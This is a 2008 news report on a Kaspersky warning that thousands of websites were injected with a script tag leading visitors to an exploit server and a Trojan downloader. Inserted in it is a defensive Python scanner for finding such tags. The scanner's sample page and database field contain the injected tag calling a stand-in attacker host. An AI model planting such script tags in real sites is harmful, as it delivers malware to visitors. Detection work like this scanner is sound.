As many as 10,000 websites compromised in only two days

Nov 10, 2008 10:46 GMT

Security vendor Kaspersky Labs warns that between 2,000 and 10,000 American and Western European web pages have been hacked within a two-day interval. The cybercriminals responsible for the attack have not yet been identified, but the details of the incident closely resemble those of an attack that took place last spring and eventually resulted in over 1.5 million pages being compromised.

The affected pages have been injected with code that loads a malicious JavaScript file from remote servers. According to the analysis, the attackers add a tag that looks like <script src=http://******/h.js> to the websites. The .js file is hosted on at least six different servers and, when loaded by a visitor's browser, it redirects the user to an attack server which serves multiple exploits.

The attack server is located in China and attempts to exploit several vulnerabilities in well-known software applications such as Adobe Flash Player, Internet Explorer, Firefox or Windows Media Encoder. If exploitation succeeds, a Trojan-Downloader application, identified by Kaspersky as Trojan-Downloader.Win32.Hah.a, is installed on the compromised system.

As the name implies, this malicious application is capable of downloading and installing other malware, as defined in a configuration file hosted on the server. This includes several Trojans with spying and data-stealing capabilities, some of which are even capable of neutralizing well-known anti-virus products in order to evade detection.

“We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen,” writes Aleks Gostev, Senior Virus Analyst at Kaspersky, on the company's weblog. He also points out that a common pattern for most of the affected websites is that they run on an ASP engine and he urges webmasters that run websites with such a setup to scan their pages for the malicious tag.
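The check Gostev recommends, scanning a site's pages for the injected tag, can be automated. The scanner below is an added example, not code from the article or from Kaspersky. It extracts every `<script src=...>` reference from HTML (or from any other text, such as a product-description column exported from the site's database, since an SQL injection would plant the tag there rather than in static files), classifies each by host against an allowlist of hosts the site legitimately loads scripts from, and flags remote scripts named `h.js` or loaded from any host not on the allowlist. The trusted hosts, the `attacker.invalid` host standing in for the masked `******` domain in the report, and the sample page and database field are all constructed for the example.

```python
"""Scan HTML files or raw text for injected remote <script src=...> tags.

Added example for the Kaspersky report described above; not the vendor's tool.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption (constructed): hosts this site legitimately loads scripts from.
TRUSTED_HOSTS = {"www.example.com", "cdn.example.com"}

# Script file name quoted in the report; the attacker host itself is masked there.
KNOWN_BAD_SCRIPT_NAMES = {"h.js"}


class ScriptTagCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.scripts.append(value.strip())


# Fallback for fragments the parser cannot make sense of (e.g. a tag truncated
# by a database column limit); handles quoted and unquoted src values.
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def extract_script_srcs(text):
    """Return the sorted, de-duplicated script src values found in text."""
    collector = ScriptTagCollector()
    collector.feed(text)
    found = set(collector.scripts)
    found.update(m.group(1) for m in SCRIPT_SRC_RE.finditer(text))
    return sorted(found)


def classify_src(src):
    """Classify a src as 'local', 'trusted', 'known-bad' or 'unknown-remote'."""
    parts = urlsplit(src)
    # Strip userinfo and port so "user@host:8080" compares as "host".
    host = parts.netloc.lower().split("@")[-1].split(":")[0]
    if not host:
        return "local"          # relative path: served by the site itself
    filename = parts.path.rsplit("/", 1)[-1].lower()
    if host in TRUSTED_HOSTS:
        return "trusted"
    if filename in KNOWN_BAD_SCRIPT_NAMES:
        return "known-bad"
    return "unknown-remote"


def scan_text(text, label="<text>"):
    """Return (label, src, verdict) for every remote script that is not trusted."""
    findings = []
    for src in extract_script_srcs(text):
        verdict = classify_src(src)
        if verdict in ("known-bad", "unknown-remote"):
            findings.append((label, src, verdict))
    return findings


def scan_files(paths):
    """Scan each file path given; unreadable files are reported, not fatal."""
    findings = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(fh.read(), path))
        except OSError as exc:
            print(f"skip {path}: {exc}", file=sys.stderr)
    return findings


# Constructed sample inputs: a page with one injected tag, and a database
# text field into which the same tag was injected.
SAMPLE_PAGE = """<html><head><title>Store</title>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/lib.js"></script>
</head><body><p>Welcome</p>
<script src=http://attacker.invalid/h.js></script>
</body></html>"""

SAMPLE_DB_FIELD = (
    "Blue widget, 10 pack</title>"
    "<script src=http://attacker.invalid/h.js></script>"
)

if __name__ == "__main__":
    targets = sys.argv[1:]
    results = scan_files(targets) if targets else (
        scan_text(SAMPLE_PAGE, "sample.html")
        + scan_text(SAMPLE_DB_FIELD, "products.description")
    )
    for label, src, verdict in results:
        print(f"{verdict:15} {label}: {src}")
```

Run it with a list of `.asp`/`.html` files to check the filesystem, or pipe exported database text through `scan_text` to check content that is rendered from the database; a `known-bad` verdict is a direct match on the reported script name, while `unknown-remote` simply lists external hosts the allowlist does not cover and needs a human to confirm.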

Although this attack is currently nowhere near the scale of the one that occurred earlier this year, the situation could easily escalate. “Things are still developing, and the similar nature of the malicious programs used in both attacks lead us to think that this new wave of attacks is potentially pretty serious,” warns Mr. Gostev.